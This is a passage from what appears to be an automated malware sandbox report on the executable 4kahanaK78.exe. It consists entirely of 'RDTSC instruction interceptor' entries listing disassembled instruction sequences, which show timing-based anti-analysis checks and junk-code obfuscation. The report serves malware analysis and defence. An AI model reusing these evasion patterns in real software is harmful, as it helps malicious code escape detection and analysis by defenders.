00007F0E05506CFCh 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F0E05506CEEh 0x0000005d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E23E4 second address: 9E23E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E3519 second address: 9E3522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E3522 second address: 9E3526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E3526 second address: 9E353C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F0E05506CF2h 0x0000000e js 00007F0E05506CECh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E24D8 second address: 9E24DE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9DAE8F second address: 9DAE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9DAE93 second address: 9DAE97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 97E575 second address: 97E5A2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F0E05506CEAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F0E05506CF9h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 97E5A2 second address: 97E5DF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E05507504h 0x00000008 push edi 0x00000009 ja 00007F0E055074F6h 0x0000000f pop edi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007F0E05507509h 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 97E5DF second address: 97E5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007F0E05506CEEh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9EC779 second address: 9EC77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9EC8D7 second address: 9EC8F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F0E05506CEEh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9EC8F9 second address: 9EC90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jno 00007F0E055074FCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F0BB4 second address: 9F0BD2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E05506CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007F0E05506CEEh 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F0CE7 second address: 9F0CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F0CF0 second address: 9F0CFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F0CFF second address: 9F0D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0E05507503h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F0E05507509h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F0D39 second address: 9F0D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0E05506CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F661B second address: 9F6621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F6621 second address: 9F664F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05506CF6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F0E05506CEFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F664F second address: 9F6666 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jl 00007F0E055074F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F6666 second address: 9F668E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E05506CE6h 0x0000000a popad 0x0000000b jmp 00007F0E05506CF3h 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F0E05506CE6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F668E second address: 9F66AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507505h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F66AD second address: 9F66B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F6828 second address: 9F682C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F682C second address: 9F6846 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F6846 second address: 9F685B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E055074FAh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F685B second address: 9F685F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F6B50 second address: 9F6B56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F6B56 second address: 9F6B5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F6B5C second address: 9F6B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F6F9F second address: 9F6FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jne 00007F0E05506CE6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F6FB0 second address: 9F6FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A00BC2 second address: A00BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0E05506CF7h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A00BE4 second address: A00BEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9FF8A2 second address: 9FF8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9FFA21 second address: 9FFA27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9FFA27 second address: 9FFA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F0E05506CEFh 0x00000010 jg 00007F0E05506CE6h 0x00000016 popad 0x00000017 jbe 00007F0E05506CEEh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A00004 second address: A00020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007F0E055074F6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0E055074FBh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A00020 second address: A0003D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CF9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0003D second address: A0004F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E055074F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0004F second address: A00053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A00053 second address: A00057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A005F6 second address: A005FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A008A7 second address: A008B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A008B2 second address: A008B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A008B9 second address: A008D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0E055074F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F0E055074F6h 0x00000013 jns 00007F0E055074F6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A048B6 second address: A048CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F0E05506CF0h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A048CF second address: A048D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A048D3 second address: A048D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0A386 second address: A0A38F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0A38F second address: A0A395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0A395 second address: A0A3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E055074F6h 0x0000000a popad 0x0000000b js 00007F0E055074F8h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 js 00007F0E055074FEh 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0A3B4 second address: A0A3D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0E05506CF6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0A3D2 second address: A0A3D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A08DB1 second address: A08DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0965F second address: A09679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507506h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A097EB second address: A097EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A09928 second address: A0992D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A09A60 second address: A09A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A09A64 second address: A09A68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A09A68 second address: A09A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E05506CF9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A09A8B second address: A09A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A09A8F second address: A09AA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A09AA9 second address: A09AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A08A9B second address: A08AB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E05506CF0h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jg 00007F0E05506CE6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0EE96 second address: A0EE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0EE9A second address: A0EEA7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E05506CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0EEA7 second address: A0EEAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C9472 second address: 9C9478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C9478 second address: 9AEC3D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0E05507502h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c and edx, 1B938F1Ah 0x00000012 lea eax, dword ptr [ebp+124801A3h] 0x00000018 mov edi, dword ptr [ebp+122D2DF3h] 0x0000001e nop 0x0000001f push ecx 0x00000020 push esi 0x00000021 pushad 0x00000022 popad 0x00000023 pop esi 0x00000024 pop ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007F0E05507500h 0x0000002d push eax 0x0000002e pop eax 0x0000002f popad 0x00000030 pop edx 0x00000031 nop 0x00000032 jnl 00007F0E055074F7h 0x00000038 call dword ptr [ebp+122D1862h] 0x0000003e pushad 0x0000003f pushad 0x00000040 pushad 0x00000041 popad 0x00000042 pushad 0x00000043 popad 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 jno 00007F0E055074FCh 0x0000004d jmp 00007F0E055074FCh 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 pushad 0x00000056 popad 0x00000057 jmp 00007F0E05507502h 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C9582 second address: 9C959E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C959E second address: 9C95A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C95A2 second address: 9C9670 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], ebx 0x0000000d sbb di, 0E15h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov cx, D4BFh 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007F0E05506CE8h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e mov dword ptr [ebp+124801FBh], esp 0x00000044 mov edx, dword ptr [ebp+122D35D2h] 0x0000004a cmp dword ptr [ebp+122D3526h], 00000000h 0x00000051 jne 00007F0E05506DEDh 0x00000057 push 00000000h 0x00000059 push ebp 0x0000005a call 00007F0E05506CE8h 0x0000005f pop ebp 0x00000060 mov dword ptr [esp+04h], ebp 0x00000064 add dword ptr [esp+04h], 00000016h 0x0000006c inc ebp 0x0000006d push ebp 0x0000006e ret 0x0000006f pop ebp 0x00000070 ret 0x00000071 jmp 00007F0E05506CEDh 0x00000076 mov ecx, dword ptr [ebp+122D362Eh] 0x0000007c mov byte ptr [ebp+122D1B46h], 00000047h 0x00000083 mov edx, dword ptr [ebp+122D37AEh] 0x00000089 mov dword ptr [ebp+122D26E9h], eax 0x0000008f mov eax, D49AA7D2h 0x00000094 sub dword ptr [ebp+122D1B73h], esi 0x0000009a nop 0x0000009b jns 00007F0E05506CEEh 0x000000a1 push edi 0x000000a2 push eax 0x000000a3 push edx 0x000000a4 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C9670 second address: 9C9683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E055074FAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C9683 second address: 9C9687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C9687 second address: 9C9691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C9A50 second address: 9C9AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jnc 00007F0E05506CECh 0x0000000d popad 0x0000000e xor dword ptr [esp], 36142F5Eh 0x00000015 push ecx 0x00000016 and ch, 00000027h 0x00000019 pop ecx 0x0000001a call 00007F0E05506CE9h 0x0000001f jmp 00007F0E05506CF6h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0E05506CF2h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C9AA4 second address: 9C9ACF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507505h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F0E055074FCh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C9ACF second address: 9C9B08 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E05506CE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push esi 0x0000000f jmp 00007F0E05506CF5h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a jnc 00007F0E05506CECh 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C9B08 second address: 9C9B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C9BC1 second address: 9C9BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C9BC7 second address: 9C9BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C9E61 second address: 9C9E66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C9F9C second address: 9C9FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F0E055074F8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov di, 06CBh 0x00000027 push 00000004h 0x00000029 mov edx, dword ptr [ebp+122D3622h] 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C9FDA second address: 9C9FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
